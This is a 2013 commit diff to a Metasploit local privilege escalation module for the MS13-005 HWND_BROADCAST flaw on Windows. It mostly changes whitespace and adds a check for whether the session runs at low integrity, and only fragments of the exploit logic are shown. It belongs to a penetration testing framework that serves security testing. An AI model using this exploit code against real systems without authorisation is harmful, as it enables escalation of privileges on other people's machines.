Check for low integrity

Meatballs1 · Meatballs1 · commit 72b8891ba373 · 2013-07-26T03:16:45.000+01:00
diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Local
 
 	def initialize(info={})
 		super( update_info( info,
-			'Name'          => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
-			'Description'   => %q{
+			'Name'		=> 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
+			'Description'	=> %q{
 					The Windows kernel does not properly isolate broadcast messages from low integrity
 					applications from medium or high integrity applications. This allows commands to be
 					broadcasted to an open medium or high integrity command prompts allowing escalation
@@ -31,16 +31,16 @@ def initialize(info={})
 					Vista so you will have to check if the user is already running a command prompt
 					and set SPAWN_PROMPT false.
 			},
-			'License'       => MSF_LICENSE,
-			'Author'        =>
+			'License'	=> MSF_LICENSE,
+			'Author'	=>
 				[
 					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
 					'Tavis Ormandy', #Discovery
 					'Axel Souchet' #@0vercl0k POC
 				],
-			'Platform'      => [ 'win' ],
-			'SessionTypes'  => [ 'meterpreter' ],
-			'Targets'       =>
+			'Platform'	=> [ 'win' ],
+			'SessionTypes'	=> [ 'meterpreter' ],
+			'Targets'	=>
 			[
 				[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
 				[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
@@ -69,6 +69,26 @@ def initialize(info={})
 		)
 	end
 
+	# Refactor this into Post lib with adobe_sandbox_adobecollabsync.rb
+	# Or use GetToken railgun calls?
+	def low_integrity_level?
+		tmp_dir = expand_path("%TEMP%")
+		cd(tmp_dir)
+		new_dir = "#{rand_text_alpha(5)}"
+		begin
+			session.shell_command_token("mkdir #{new_dir}")
+		rescue
+			return true
+		end
+
+		if directory?(new_dir)
+			session.shell_command_token("rmdir #{new_dir}")
+			return false
+		else
+			return true
+		end
+	end
+
 	def win_shift(number)
 		vk = 0x30 + number
 		bscan = 0x81 + number
@@ -100,9 +120,9 @@ def cleanup
 	end
 
 	def primer
-		# syinfo is only on meterpreter sessions
 		e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
 		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+		fail_with(Exploit::Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level?
 
 		if datastore['SPAWN_PROMPT']
 			@hwin = client.railgun.kernel32.GetConsoleWindow()['return']
@@ -119,7 +139,6 @@ def primer
 
 			count = count_cmd_procs
 			spawned = false
-			# Bruteforce taskbar position Win+Shift+?
 			print_status("Bruteforcing Taskbar Position")
 			9.downto(1) do |number|
 				vprint_status("Attempting Win+Shift+#{number}")
